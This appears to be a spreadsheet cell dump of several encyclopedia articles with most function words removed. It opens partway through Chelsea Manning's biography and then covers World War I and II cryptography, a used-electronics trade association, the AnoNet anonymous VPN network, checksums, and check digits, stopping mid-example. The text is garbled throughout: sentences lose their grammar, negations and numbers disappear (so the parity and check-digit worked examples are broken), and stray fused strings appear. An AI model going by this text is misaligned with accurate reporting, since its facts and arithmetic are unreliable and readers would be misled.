mind going prison rest life [for leaking information], executed much, possibility pictures plastered world press made motherboard". april posted facebook utterly lost, next days wrote "not piece equipment", "beyond frustrated" "livid" "lectured ex-boyfriend despite months relationship ambiguity".on according army witnesses, manning found curled fetal position storage cupboard; knife feet words want" vinyl chair. hours later altercation female intelligence analyst, specialist jihrleah showman, punched showman face. brigade psychiatrist recommended discharge, referring "occupational problem adjustment disorder". manning's supervisor removed bolt weapon, making unable fire, sent work supply office, although point security clearance remained place. punishment altercation showman, demoted specialist (e-4) private first class (e-3) three days arrest 27.ellen nakashima writes that, manning contacted jonathan odell, american novelist minneapolis, facebook, leaving message wanted speak confidence; said involved "very high-profile events, albeit nameless individual thus far". according army investigators, emailed eric schmiedl, mathematician boston, told source baghdad airstrike video. days later, began series chats adrian lamo arrest. publication leaked material wikileaks wikileaks late 2006 disclosure portal, initially using wikipedia model, volunteers would write restricted legally threatened material submitted whistleblowers. julian assange—an australian internet activist journalist, facto editor-in-chief wikileaks—who idea creating laurie called "open-source, democratic intelligence agency". open-editing aspect soon abandoned, site remained open anonymous submissions.according daniel domscheit-berg, former wikileaks spokesperson, part wikileaks security concept know sources were. york times wrote december 2010 u.s. government trying discover whether assange passive recipient material manning, encouraged helped extract files; latter, assange could charged conspiracy. manning told lamo 2010 developed working relationship assange, communicating directly using encrypted internet conferencing service, knew little him. wikileaks identify manning source. army investigators found pages chats manning's computer manning someone believed julian assange. nicks writes that, despite this, decisive evidence found assange's offering manning direction. reykjavik13 february 2010, wikileaks posted first material manning, diplomatic cable u.s. embassy reykjavík, document known "reykjavik13". march wikileaks posted 32-page report written 2008 u.s. department defense wikileaks itself, march posted u.s. state department profiles politicians iceland. baghdad airstrike wikileaks named baghdad airstrike video "collateral murder", assange released april 2010, press conference national press club washington, d.c. video showed helicopters firing group amin district baghdad. among people killed attack reuters employees, photograph american humvee attack mahdi army. pilots mistook cameras weapons. helicopters also fired van, targeted earlier helicopter, stopped help wounded members first group. children wounded, father killed. pilots also attacked building retreating insurgents holed washington post wrote video, viewed millions, wikileaks map. according nicks, manning emailed superior officer video aired tried persuade version stored siprnet. nicks writes seemed though manning wanted caught. afghan logs, iraq logs july 2010, wikileaks three media partners—the york times, guardian, spiegel—began publishing 91,731 documents that, entirety, became known afghan logs. (around 77,000 published 2012.) this followed october 2010, 391,832 classified military reports covering period january 2004 december 2009, became known iraq logs. nicks writes publication former watershed moment, "beginning information exploding upon itself". diplomatic cables manning also responsible "cablegate" leak 251,287 state department cables, written american embassies consulates countries, dated december 1966 february 2010. cables passed assange three media partners, plus país others, published stages november 2010, names sources removed. wikileaks said largest confidential documents ever released public domain. wikileaks published remaining cables, unredacted, september 2011, david leigh luke harding guardian inadvertently published passphrase file still online; nicks writes that, consequently, ethiopian journalist leave country, u.s. government said relocate several sources. guantanamo files manning also accused source guantanamo files leak, obtained wikileaks 2010 published york times guardian april 2011. granai airstrike manning said gave wikileaks video, late march 2010, granai airstrike afghanistan. airstrike occurred 2009, village granai, afghanistan, killing afghan civilians. video never published; julian assange said march 2013 daniel domscheit-berg taken left wikileaks apparently destroyed manning adrian lamo first contact 2010, manning contacted adrian lamo, former "grey hat" hacker convicted 2004 accessed york times computer network years earlier without permission. lamo profiled kevin poulsen wired magazine; story said lamo involuntarily hospitalized diagnosed asperger syndrome. poulsen, reporter, former hacker used lamo source several times since 2000. indeed poulsen who, 2002, told york times lamo gained unauthorized access network; poulsen wrote story securityfocus. lamo would hack system, tell organization, offer security, often using poulsen go-between.lamo said manning sent several encrypted emails said unable decrypt replied anyway invited emailer chat lamo said later turned emails without read them. chats series chats manning—using handle "bradass87"—told lamo leaked classified material. introduced army intelligence analyst, within minutes, without waiting reply, alluded leaks.lamo replied several hours later. said: "i'm journalist minister. pick either, treat confession interview (never published) enjoy modicum legal protection." they talked restricted material general, manning made first explicit reference leaks: "this friends." linked section 2010, version wikipedia's article wikileaks, described wikileaks release march year department defense report wikileaks itself. added "the mine too"; section article referred leak baghdad airstrike ("collateral murder") video. manning said felt isolated fragile, reaching someone hoped might understand.manning said started help wikileaks around thanksgiving november 2009—which fell november year—after wikileaks released 9/11 pager messages; messages released november told lamo recognized messages came database seeing made feel comfortable stepping forward. lamo asked kind material manning dealing with; manning replied: "uhm crazy, almost criminal political backdealings non-pr-versions world events crises ..." although said dealt assange directly, manning also said assange adopted deliberate policy knowing little her, telling manning: "lie me."lamo assured speaking confidence. manning wrote: "but source talking someone needs moral emotional fucking support," lamo replied: told you, none print."manning said incident affected detainees arrested iraqi federal police printing anti-iraqi literature. asked army find "bad guys" were, discovered detainees followed manning said corruption trail within iraqi cabinet. reported commanding officer, said want hear it"; said officer told help iraqi police find detainees. manning said made realize, actively involved something completely ..."she explained cant separate others feel connected everybody like distant family," cited carl sagan, richard feynman elie wiesel. said hoped material would lead "hopefully worldwide discussion, debates, reforms. [sic] we're doomed species." said downloaded material onto lady gaga music cd-rws, erased music replaced compressed split file. part reason noticed, said, staff working hours day, seven days week, "people stopped caring weeks." lamo approaches authorities, chat logs published shortly first chat manning, lamo discussed information chet uber volunteer group project vigilant, researches cybercrime, timothy webster, friend worked army counterintelligence. both advised lamo authorities. friend informed army's criminal investigation command (cid), lamo contacted agents shortly thereafter. told believed manning endangering lives. largely ostracized hacker community afterwards. nicks argues, hand, thanks lamo government months ameliorate harm caused release diplomatic cables.lamo army investigators california, showed chat logs. around date also passed story kevin poulsen wired, gave chat logs manning's name embargo. day, point told manning arrested iraq before. poulsen zetter broke news arrest wired june wired published around percent chat logs june full logs july 2011. legal proceedings arrest charges manning arrested army's criminal investigation command, 2010, transferred four days later camp arifjan kuwait. charged several offenses july, replaced charges march 2011, including violations articles uniform code military justice (ucmj), espionage act. serious charge "aiding enemy", capital offense, although prosecutors said would seek death penalty. another charge, manning's defense called "made offense" found guilty, read manning "wantonly [caused] published internet intelligence belonging government, knowledge intelligence published internet accessible enemy". detention while kuwait, manning placed suicide watch behavior caused concern. moved kuwait marine corps base quantico, virginia, july 2010, classified maximum custody detainee prevention injury (poi) status. status stop short suicide watch, entailing checks guards every five minutes. lawyer, david coombs, former military attorney, said manning allowed sleep weekends) made stand tried required remain visible times, including night, entailed access sheets, pillow except built mattress, blanket designed shredded. manning complained regarded pretrial punishment.her cell (1.8 window, containing bed, toilet, sink. jail cells built shape, although detainees could talk another, unable other. lawyer said guards behaved professionally tried harass embarrass manning. allowed walk hour day, meals taken cell, shackled visits. there access television placed corridor, allowed keep magazine book. because pretrial detention, received full pay.on january 2011, manning altercation guards, commander quantico classified suicide risk. manning said guards begun issuing conflicting commands, "turn left, turn left," upbraiding responding commands "yes" instead "aye". shortly afterward, placed suicide watch, clothing eyeglasses removed, required remain cell hours day. suicide watch lifted january complaint lawyer, brig commander ordered replaced. march told request removal status—which entailed among things sleeping wearing boxer shorts—had denied. lawyer said manning joked guards that, wanted harm herself, could underwear flip-flops. comment resulted manning's ordered strip naked cell night sleep without clothing. following morning only, manning stood naked inspection. following lawyer's protest media attention, manning issued sleeping garment march 11.the detention conditions prompted national international concern. juan méndez, united nations special rapporteur torture, told guardian u.s. government's treatment manning "cruel, inhuman degrading". january 2011, amnesty international asked british government intervene manning's status british citizen descent, although manning's lawyer said manning regard british citizen. march state department spokesman philip crowley criticized manning's treatment "ridiculous, counterproductive stupid". following day, president obama responded crowley's comments, saying pentagon assured manning's treatment "appropriate meet[s] basic standards". under political pressure, crowley resigned three days comments. march members academic legal community signed statement arguing manning subjected "degrading inhumane pretrial punishment" criticizing obama's comments. april pentagon transferred manning medium-custody midwest joint regional correctional facility, fort leavenworth, kansas, placed 80-square-foot cell window normal mattress, able pretrial detainees keep personal objects cell. evidence presented article hearing april 2011, panel experts, completed medical mental evaluation manning, ruled stand trial. article hearing, presided lieutenant colonel paul almanza, convened december 2011, fort meade, maryland; hearing resulted almanza's recommending manning referred general court-martial. arraigned february 2012, declined enter plea.during article hearing, prosecution, captain ashden fein, presented 300,000 pages documents evidence, including chat logs classified material. court heard army investigators, special agent david shaver, head digital forensics research branch army's computer crime investigative unit (cciu); mark johnson, digital forensics contractor mantech international, works cciu. they testified found 100,000 state department cables workplace computer manning used november 2009 2010; 400,000 military reports iraq 91,000 afghanistan card found basement room aunt's home potomac, maryland; 10,000 cables personal macbook storage devices said passed wikileaks file corrupted. they also recovered pages encrypted chats, unallocated space manning's macbook hard drive, manning someone believed julian assange. chat handles, used berlin chaos computer club's domain (ccc.de), associated names julian assange nathaniel frank.johnson said found logs macbook showed sftp connection, address resolved manning's aunt's home, swedish address links wikileaks. also found text file named "readme", attached logs apparently written manning assange, called iraq afghan logs "possibly significant documents time, removing revealing true nature 21st century asymmetric warfare". investigators testified also recovered exchange 2010 manning eric schmiedl, boston mathematician, manning said source baghdad helicopter attack ("collateral murder") video. johnson said attempts delete material macbook. operating system re-installed january 2010, around january 2010, attempt made erase hard drive "zero-fill", involves overwriting material zeroes. material recovered overwrite attempts unallocated space.manning's lawyers argued government overstated harm release documents caused overcharged manning force give evidence assange. defense also raised questions whether manning's confusion gender identity affected behavior decision making. guilty plea, trial, sentence judge, army colonel denise lind, ruled january 2013 sentence would reduced days treatment manning received quantico. february manning pleaded guilty charges. reading hour 35-page statement, said leaked cables show true cost war". prosecutors pursued court-martial remaining charges.the trial began june 2013. manning convicted july charges entirety, including five counts espionage theft, amended version four charges; acquitted aiding enemy. sentencing phase began next day.captain michael worsley, military psychologist treated manning arrest, testified manning left isolated army, trying deal gender identity issues "hyper-masculine environment". david moulton, navy forensic psychiatrist manning arrest, said manning narcissistic traits, showed signs fetal alcohol syndrome asperger syndrome. said that, leaking material, manning "acting grandiose ideation". defense psychiatrist, testifying manning's motives, suggested different agenda:well, manning impression leaked information going really change world views wars afghanistan iraq, future wars, actually. this attempt crowdsource analysis war, opinion crowdsourcing, enough analysis done documents, felt important, would lead greater good society whole would come conclusion worth really wars worth august manning apologized court: sorry actions hurt people. sorry hurt united states. sorry unintended consequences actions. when made decisions believed going help people, hurt people. time decisions, dealing issues."manning's offenses carried maximum sentence years. government asked years deterrent others, manning's lawyer asked years. sentenced august years prison, reduction rank private (private pvt), forfeiture allowances, dishonorable discharge. given credit 1,293 days pretrial confinement, including days treatment quantico, would eligible parole serving one-third sentence. confined united states disciplinary barracks (usdb) fort leavenworth, kansas.the sentence criticized "unjust unfair" guardian, "excessive" york times. april 2014, manning's request clemency denied; case went united states army court criminal appeals review. requests release september 2013, manning's lawyer filed petition commutation sentence president obama pardon attorney department justice secretary army john mchugh. petition contended manning's disclosures cause "real damage", documents question merit protection sensitive. request included supporting letter amnesty international said manning's leaks exposed violations human rights. david coombs's cover letter touched manning's role whistleblower, asking manning granted full pardon sentence reduced time served.in april 2015, amnesty international posted online letter manning wrote: preparing court-martial appeal first appeals court. appeal team, attorneys nancy hollander vince ward, hoping file brief court next months. already success getting court respect gender identity using feminine pronouns court filings (she, her, etc.)."in november 2016, manning made formal petition president obama reduce 35-year sentence years time already served. december 2016, white house petition commute sentence reached minimum 100,000 signatures required official response. lawyers familiar clemency applications stated december 2016 pardon unlikely happen; request usual criteria. commutation january 2017, justice department source said manning president obama's short list possible commutation. january 2017, president obama commuted four months manning's remaining sentence. press conference held january obama stated manning's original 35-year prison sentence "very disproportionate relative leakers received" makes sense commute—and pardon—her sentence." 2021, forbes reported obama's commutation manning's sentence "unconditional." notwithstanding commutation, manning's military appeal would continue, attorney saying, fight appeal </t>
  </si>
  <si>
    <t>World War II cryptography</t>
  </si>
  <si>
    <t>cryptography used extensively world importance radio communication ease radio interception. nations involved fielded plethora code cipher systems, many latter using rotor machines. result, theoretical practical aspects cryptanalysis, codebreaking, much advanced. possibly important codebreaking event successful decryption allies german "enigma" cipher. first break enigma accomplished polish cipher bureau around 1932; techniques insights used passed french british allies outbreak 1939. they substantially improved british efforts bletchley park war. decryption enigma cipher allowed allies read important parts german radio traffic important networks invaluable source military intelligence throughout war. intelligence source high level sources, cryptanalysis lorenz cipher, eventually called ultra.a similar break secure japanese diplomatic cipher, designated purple army signals intelligence service, started entered war. product source called magic. side, german code breaking world achieved notable successes cracking british naval ciphers. australia central bureau frumel: fleet radio unit, melbourne secret intelligence australia finland finnish defence intelligence agency france bruno hans-thilo schmidt germany enigma machine fish (cryptography) british codename german teleprinter ciphers lorenz cipher fish cipher codenamed tunny british siemens halske geheimfernschreiber, fish cipher codenamed sturgeon british short weather cipher b-dienst reservehandverfahren okw/chi gisbert hasenjaeger italy hagelin machine enigma machine japan japanese army diplomatic codes japanese naval codes purple jn-25 poland cryptanalysis enigma biuro szyfrów (cipher bureau) marian rejewski jerzy różycki henryk zygalski bomba lacida machine sweden arne beurling united kingdom bletchley park cryptanalysis enigma cryptanalysis lorenz cipher east combined bureau (fecb) naval intelligence division (nid) wireless experimental centre (wec) bombe colossus computer typex syko ultra alan turing tutte john tiltman newman tommy flowers good john herivel marks poem code united states magic (cryptography) signals intelligence service army, also arlington hall op-20-g navy signals intelligence group elizebeth smith friedman william friedman frank rowlett abraham sinkov genevieve grotjan feinstein rosen joseph rochefort, leader effort crack japanese naval codes joseph mauborgne agnes meyer driscoll sigaba cipher machine sigsaly voice encryption sigtot one-time tape system m-209 cipher machine station hypo cryptanalysis group station cast cryptanalysis group station negat also cryptography history cryptography world cryptographyultra (cryptography) magic (cryptography)cryptanalysis enigma bombeenigma (machine) sigaba typex lorenz cipher geheimfernschreiber codetalkers purple sigsaly jn-25bletchley park biuro szyfrów bruno army, later moved arlington hall op-20-g navymarian rejewski jerzy różycki henryk zygalskialan turing tutte john tiltman newman tommy flowers goodwilliam friedman frank rowlett abraham sinkov joseph rochefort agnes meyer driscollhans-thilo schmidt references</t>
  </si>
  <si>
    <t>World War I cryptography</t>
  </si>
  <si>
    <t>codes ciphers used extensively world decoding british naval intelligence zimmermann telegram helped bring united states war. trench codes used field armies combatants (americans, british, french, german) world i.the commonly used codes simple substitution codes. more important messages generally used mathematical encryption extra security, though. codes required distribution codebooks military personnel, proved security liability since books could stolen enemy forces. britain british decrypting carried room royal navy british military (army) intelligence. zimmermann telegram arthur zimmermann british military (army) intelligence room royal navy (britain) alastair denniston room james alfred ewing room first head nigel grey room william hall ‘blinker’ hall, room second head dilly knox room oliver strachey william montgomery (cryptographer) room playfair cipher russia ernst fetterlein tsarist russian ministry foreign affairs 1896 solved (among others) german, austrian british codes. eventually made chief cryptographer rank admiral. with russian revolution 1917 fled britain recruited room june 1918 work austrian, bolshevik georgian codes. russians used overcomplicated version vigenère cipher. broken within three days austro-hungarian cryptanalyst hermann pokorny. france french army employed georges painvin, étienne bazeries came retirement, german ciphers. prewar activities, french prepared nation involved decode german radiograms. beginning war, france eight intercept stations: maubeuge, verdun, toul, epinal, belfort, lille, rheims, besançon. during war, many stations, including eiffel tower. according colonel cartier ministry, france intercepted 100,000,000 words german radiograms course war. tableau concordance main french diplomatic cipher. germany austria-hungary imperial german army austro-hungarian army intercepted russian radio communications traffic, although german success battle tannenberg (1914) interception messages imperial russian army commanders cleartext. german abhorchdienst, code-breaking bureau composed mainly mathematicians, established 1916. germans specific regulations regarding kinds codes ciphers could used given circumstances. within three kilometers front lines, known danger zone, communications required code known three-number code. this code cipher permitted. behind danger zone, another code known three-letter code allowed used. communications divisions, corps, army headquarters done adfgvx cipher.the adfgx adfgvx field ciphers modified polybius system single order double columnar transposition frequent change, letters optimized morse. later broken famous french cryptanalyst georges painvin. breaking adfgx cipher painvin second time cryptanalysis played major role shaping events (the first interception cracking zimmerman telegram). breaking cipher, french able decode intercepted message forwarding munitions german offensive, letting french know offensive would occur, thus allowing stop this message became known "the radiogram victory." united states herbert yardley began code clerk state department. after outbreak became head cryptographic section military intelligence section (mi-8) american expeditionary force world signals corps cryptologic officer france. later headed cipher bureau, cryptanalysis group started 1919, immediately world funded jointly state department army. some american cryptography world done riverbank laboratories, chicago, privately owned colonel george fabyan. elizebeth friedman, william friedman agnes meyer driscoll worked there. navy used cryptographic code a-1. navy cryptanalysis group, op-20-g, also started world 1922). also started employing indian code talkers world initially members cherokee choctaw tribes. also world cryptography history cryptography world cryptography references external links online books, library resources library libraries world cryptography</t>
  </si>
  <si>
    <t>World Reuse, Repair and Recycling Association</t>
  </si>
  <si>
    <t>world reuse, repair recycling association (wr3a) business consortium dedicated reform trade e-waste. wr3a inspired fair trade organizations. history wr3a fair trade association (tradename fair trade recycling reserved 2013) established improve export markets surplus electronics e-waste, defend biased reporting racial profiling. wr3a conceived 2006 following visit china group including electronics recycler (american retroworks inc.), university california davis recycling program director, seattle recycler zero-export policy. group inspired visit three china's semi knock factories. those factories purchased computer monitors still functional crts. crts knocked bare tube, inserted monitor case, complete tuner board, etc. wr3a founders observed western journalists reporting purchase import used crts invariably described "primitive" wire burning operations, rather re-manufacturers. these often contract manufacturers originally assembled brand monitors, rebuilt second-hand crts. refurbishing factory, video display corp tucker, georgia.wr3a proposed form coalition companies export functional monitors directly reuse factories, removing imploded, damaged, screen-burned, older, non-compliant raster (e.g. trinitron) crts loads destined factories. companies remove recycle crts would benefit higher prices, chinese factories would bypass sorting villages guiyu. wr3a swamped orders asian factories year.the chinese government, took manufacturing capacity worldwide 1990s, eventually opposed import used crts. many factory owners relocated businesses countries indonesia, malaysia, thailand. others relocated used monitor sourcing operations hong kong vietnam, trucking crts overland chinese factories. during period, several anti-globalist ngos began campaign trade used electronics, especially crts. minutes, economist, businessweek others reports claiming displays exported reused burned copper primitive scrapyards. source dumping claim later retracted it.eventually, reuse operations asia turned re-export africa, used local sources (urban asian cities) used crts used remanufacturing monitor displays. with decline purchases used displays 2011, wr3a recognized organizational conflicts cooperative suppliers competing declining market. organization refined mission 2013 emphasize "anti-defamation" overseas refurbishing companies, promoted used electronics exports peer-reviewed fair trade agreements. importers used equipment africa, asia latin america consider organization defender tech sector refurbishers. wr3a remains dedicated principle used computer exports outlawed, outlaws export used computers. organization strongly refutes considers racial profiling tech sector emerging markets. organization members south america, africa, asia, north america, europe, dedicated defending legitimate used electronics exporters organization considers false defamatory declarations "e-waste" "toxics externalization". recent activities 2015, 2017, 2018 wr3a visits agbogbloshie district central accra, bringing journalists jazeera, independent, smithsonian, others meet dagbani speaking translators. visit journalists discredit allegations agbogbloshie "the largest e-waste dump world", "former wetland outskirts city", received hundreds containers full junk electronics. wr3a found credible evidence dumping site exaggerated accra metropolitan association representatives interested relocating economic refugees develop property, three months forced evictions. used electronics processed site shown delivered carters wheelbarrows, consist devices, vcrs, imported decades previously. wr3a provided reporters world bank statistics showing domestic ghana generation accounted e-waste observed ghana, recorded organization's interviews ghana tech sector representatives (uploaded youtube wr3a). september 2013, wr3a adapted tradename "fair trade recycling". trademark registered uspto registered supplemental certification 2015. organization claim recognized "fairtrade" (one word). april 2013, wr3a held "fair trade recycling summit" middlebury college vermont. summit brought together researchers memorial university (canada), pontificia universidad catholica peru, university southern california (usa), massachusetts institute technology (mit), representatives international trade office, basel convention secretariat, interpol, several used electronics importers africa, asia, latin america. group deliberated beneficial development emerging markets electronics reuse repair (labelled "tinkerer's blessing" yuzo takahashi's 2000 technology history, network tinkerers.). role electronics repair reverse engineering development contrasted so-called "resource curse" economic development natural resource exploitation. middlebury students presenters discussed whether balanced approach recycling secondary materials warranted. follow meeting wr3a interpol held july 2013. november, 2013, interpol announced research program study used electronics trade continuing arrests african importers (project eden).the debate fair trade recycling advocates anti-export organization basel action network profiled today (september 2013), discovery magazine, 2006in july 2012, memorial university newfoundland, canada, announced 5-year research project study routes used electronics, weee, "e-waste" exports. wr3a partner research grant, along researchers universities peru california. first year, group document efforts develop "fair trade recycling" model mexico (see npr, pbs, coverage), research possible application model peru, bangladesh, china. wr3a formerly adapted registered tradename "fair trade recycling" 2012.wr3a collaborated massachusetts institute technology publication mit's january 2012 study e-waste generation exports. wr3a provided researchers detailed reconciliations years exports wr3a members. compared wr3a data corroborating data isri, usepa, basel secretariat (ghana, nigeria) studies.in 2011, wr3a interviewed part "e-waste" german news magazine zdf.kultur, investigated assumptions african imports "primitive" linked exports egypt's green revolution.in march, 2011. wr3a profiled motherboard.tv, organization's case reduced exports used electronics "stewards" unintended consequences.in october, 2010, wr3a announced partnership basel action network reduce unnecessary breakage destruction working computer monitors california, california sb20 laws. this followed report critical california "cancellation" policies published sacramento july 2010.on july 2010, discovery news presented analysis contrasting wr3a's "fair trade" engagement approach basel action network's (ban) "trade restriction" approach, abstained choosing sides.,on 2009, national public radio's (npr) program living earth profiled wr3a's members women's cooperative repair recycling mexico.in january 2009, organization presented statistics film keynote address 2009 vegas. statistics demonstrated rate growth internet access much higher countries incomes. logically unlikely growth achieved computers. wr3a also presented film reuse refurbishing operations demonstrate proper recycling practices best available practices countries.the wr3a contracted consultant environmental protection agency july 2008 publication electronic waste management united states. references external links world reuse, repair recycling association</t>
  </si>
  <si>
    <t>AnoNet</t>
  </si>
  <si>
    <t>anonet decentralized friend-to-friend network built using vpns software routers. anonet works making difficult learn identities others network allowing anonymously host ipv4 ipv6 services. motivation implementing anonymous network service service basis drawbacks, debatable work built application level. simpler approach could design ipv4/ipv6 network participants enjoyed strong anonymity. doing allows number applications services already written available internet large. ipv4 networks preclude anonymity design; necessary decouple identity owner address address itself. commercial internet connectivity need billing records makes impossible, private ipv4 networks share requirement. assuming router administrator metanet knows information adjacent routers, standard routing protocols take care finding proper path packet take reach destination. destinations people's threat models considered anonymous. this immediate peers know anyone directly connected knows 21.0.0.0/8 range, necessarily tied identifiable information. anonet pseudonymous everyone build profile anonet address: kind documents publishes requests, language, countries towns, etc. ever publishes document lead owner's identity, documents ever published requested tied identity. unlike friend friend (f2f) programs, automatic forwarding anonet hides node nodes directly connected however, existing programs used inside anonet, making harder detect someone uses programs (only connection seen outside, traffic analysis remain possible). architecture since running fiber distant hosts prohibitively costly volunteer nature network, network uses off-the-shelf software router router, router user links. this offers advantages well, invulnerability external eavesdropping lack need unusual software might give notice interested participating. avoid addressing conflict internet itself, anonet initially used range 1.0.0.0/8. this avoid conflicting internal networks 10.0.0.0/8, 172.16.0.0/12 192.168.0.0/16, well assigned internet ranges. january 2010 iana allocated 1.0.0.0/8 apnic. march 2017 anonet changed network 21.0.0.0/8 subnetwork, assigned united states department defense currently internet. network arranged regular, repeating pattern routers, although redundant (&gt;1) links desired. this serves make decentralized, reduces choke points, allows redundancy. suitable choices available, numerous. robust ipsec package acceptable, frees/wan greenbow. non-ipsec solutions also exist, openvpn tunneling. there requirement homogeneous network; link could fact different daemon. goals primary goals anonet protect participants' rights speech expression, especially come attack late. some examples might protected anonet include: fiction decss criticisms electronic voting machines. bnetd similar software song south films historical interest unavailable political controversy works impossible internet communicate another host without knowing address. thus, anonet realizes known peer, along subnet mask used communicating them. routing protocol, bgp, allows node advertise routes like, seemingly chaotic method provides users anonymity. once node advertises route, hard anyone else determine route another machine another country vpn, dummy interface users machine. possible certain analysis could used determine subnet remote another country), local either dummy interface, machine connected ethernet.) these include timestamps, ping times, identification, user agents, traffic analysis. most mitigatible action users' part. scaling there 65536 asns available long anonet reaches number routers network split ospf clouds, switched completely different routing protocol alter protocol 32bit integer asns, like rest internet since 32-bit numbers standardised. there also 65536 subnets 21.0.0.0/8 subnet. this would easier overcome adding unused subnet any. allocated subnets below list allocated ipv4 ipv6 subnets march 2020. 21.3.3.0/24 21.3.37.0/24 21.4.9.200/30 21.3.4.0/24 21.0.0.0/24 21.22.1.0/24 21.4.9.153/32 21.3.3.96/30 21.50.0.0/24 21.71.12.0/24 21.41.41.0/24 21.3.3.8/32 21.0.99.11/32 21.63.70.0/24 21.4.9.53/32 21.3.3.1/32 21.78.0.53/32 21.3.3.7/32 21.255.222.0/24 21.3.3.10/32 21.255.112.0/24 21.255.113.0/24 21.79.3.153/32 21.3.3.3/32 21.104.100.0/24 21.255.114.0/24 fd63:1e39:6f73:ff72::/64 fd63:1e39:6f73:ff75::/64 fd63:1e39:6f73:325::/64 fd63:1e39:6f73:1601::/64 fd63:1e39:6f73:304::/64 fd63:1e39:6f73:2929::/64 fd63:1e39:6f73:1c6a::/64 fd63:1e39:6f73:303::/64 fd63:1e39:6f73:3f46::/64 fd63:1e39:6f73:3f45::/64 fd63:1e39:6f73:470c::/64 security concerns since identifiable information tied user anonet, might assume network would drop complete chaos. unlike anonymous networks, anonet particular router user causing problem easy block firewall. event affecting entire network, peers would drop tunnel. with chaotic nature random addressing, necessary hide link addresses. these already known. however, user wants services, participate discussions anonymously, advertise route, bind services clients addresses9399683974 also anonymous crypto-anarchism darknet conglomeration darknetsimilar software freenet gnunet retroshare references consideration user preference internet-based overlay network, yoo, park networking, parallel/distributed computing, 2008 2008 ieeexplore.ieee.org external links https://web.archive.org/web/20140127020051/http://anonet2.biz/ anonet wiki http://wiki.ucis.nl/anonet another informative page (including information connecting)</t>
  </si>
  <si>
    <t>Checksum</t>
  </si>
  <si>
    <t>checksum small-sized block data derived another block digital data purpose detecting errors introduced transmission storage. themselves, checksums often used verify data integrity relied upon verify data authenticity.the procedure generates checksum called checksum function checksum algorithm. depending design goals, good checksum algorithm usually outputs significantly different value, even small changes made input. this especially true cryptographic hash functions, used detect many data corruption errors verify overall data integrity; computed checksum current data input matches stored value previously computed checksum, high probability data accidentally altered corrupted. checksum functions related hash functions, fingerprints, randomization functions, cryptographic hash functions. however, concepts different applications therefore different design goals. instance, function returning start string provide hash appropriate applications never suitable checksum. checksums used cryptographic primitives larger authentication algorithms. cryptographic systems specific design goals, hmac. check digits parity bits special cases checksums, appropriate small blocks data (such social security numbers, bank account numbers, computer words, single bytes, etc.). some error-correcting codes based special checksums detect common errors also allow original data recovered certain cases. algorithms parity byte parity word simplest checksum algorithm so-called longitudinal parity check, breaks data "words" fixed number bits, computes exclusive (xor) words. result appended message extra word. simpler terms, means adding word guarantee even number '1's. check integrity message, receiver computes exclusive words, including checksum; result word consisting zeros, receiver knows transmission error occurred.with checksum, transmission error flips single message, number bits, detected incorrect checksum. however, error affects bits detected bits position distinct words. also swapping words detected. affected bits independently chosen random, probability two-bit error undetected 1/n. complement variant previous algorithm "words" unsigned binary numbers, discarding overflow bits, append two's complement total checksum. validate message, receiver adds words manner, including checksum; result word full zeros, error must occurred. this variant, too, detects single-bit error, modular used j1708. position-dependent simple checksums described fail detect common errors affect many bits once, changing order data words, inserting deleting words bits zero. checksum algorithms used practice, fletcher's checksum, adler-32, cyclic redundancy checks (crcs), address weaknesses considering value word also position sequence. this feature generally increases cost computing checksum. fuzzy checksum idea fuzzy checksum developed detection email spam building cooperative databases multiple isps email suspected spam. content spam often vary details, would render normal checksumming ineffective. contrast, "fuzzy checksum" reduces body text characteristic minimum, generates checksum usual manner. this greatly increases chances slightly different spam emails producing checksum. spam detection software, spamassassin, co-operating isps, submits checksums emails centralised service dcc. count submitted fuzzy checksum exceeds certain threshold, database notes probably indicates spam. service users similarly generate fuzzy checksum emails request service spam likelihood. general considerations message bits long viewed corner m-dimensional hypercube. effect checksum algorithm yields n-bit checksum m-bit message corner larger hypercube, dimension corners hypercube represent possible received messages. valid received messages (those correct checksum) comprise smaller set, corners. single-bit transmission error corresponds displacement valid corner (the correct message checksum) adjacent corners. error affects bits moves message corner steps removed correct corner. goal good checksum algorithm spread valid corners possible, increase likelihood "typical" transmission errors invalid corner. also general topic algorithm check digit damm algorithm data file verification fletcher's checksum frame check sequence cksum md5sum sha1sum parchive (unix) sysv checksum checksum xxhasherror correction hamming code ipv4 header checksumhash functions list hash functions luhn algorithm parity rolling checksum verhoeff algorithmfile systems file system performs automatic file integrity checking using checksumsrelated concepts isopsephy gematria file fixity references external links additive checksums theory barr group practical application cryptographic checksums checksum calculator open source python based application used verify downloads.</t>
  </si>
  <si>
    <t>Check digit</t>
  </si>
  <si>
    <t>check digit form redundancy check used error detection identification numbers, bank account numbers, used application least sometimes input manually. analogous binary parity used check errors computer-generated data. consists digits letters) computed algorithm digits letters) sequence input.with check digit, detect simple errors input series characters (usually digits) single mistyped digit permutations successive digits. design check digit algorithms generally designed capture human transcription errors. order complexity, include following: letter/digit errors, single digit errors, transposition errors, twin errors, jump transpositions errors, jump twin errors, phonetic errors, ("sixty" "sixteen")in choosing system, high probability catching errors traded implementation difficulty; simple check digit systems easily understood implemented humans catch many errors complex ones, require sophisticated programs implement. desirable feature left-padding zeros change check digit. this allows variable length numbers used length changed. single check digit added original number, system always capture multiple errors, replacement errors though, typically, double errors caught time (both changes would need change output offsetting amounts). simple check digit method would take digits (digital sum) modulo this would catch single-digit error, error would always change sum, catch transposition errors (switching digits) re-ordering change sum. slightly complex method take weighted digits, modulo different weights number position. illustrate this, example weights four digit number number coded 4871, would take i.e. modulo check digit would giving 48715. systems weights weights neighboring numbers different, widely used: example, weights codes, weights numbers (gs1 algorithm), weights used united states bank routing transit numbers. this system detects single-digit errors around transposition errors. used coprime changing digit changes check digit; using coefficient divisible would lose information (because modulo thus catch single-digit errors. using different weights neighboring numbers means transpositions change check digit; however, weights differ even number, catch transpositions digits differ since multiply yield isbn-10 code instead uses modulo prime, number positions different weights this system thus detects single digit substitution transposition errors (including jump transpositions), cost check digit possibly represented "x". alternative simply avoid using serial numbers result check digit.) isbn-13 instead uses algorithm used numbers. more complicated algorithms include luhn algorithm (1954), captures single digit transposition errors detect still sophisticated verhoeff algorithm (1969), catches single digit substitution transposition errors, many (but all) complex errors. similar another abstract algebra-based method, damm algorithm (2004), detects single-digit errors adjacent transposition errors. these three methods single check digit therefore fail capture around complex errors. reduce failure rate, necessary check digit (for example, modulo check referred below, uses check digits algorithm, international bank account number) and/or wider range characters check digit, example letters plus numbers. examples final digit universal product code check digit computed follows: digits odd-numbered positions right (first, third, fifth, etc. including check digit) together multiply three. digits including check digit) even-numbered positions (second, fourth, sixth, etc.) result. take remainder result divided (ie. modulo operation). remainder equal check digit, subtract remainder derive check digit.for 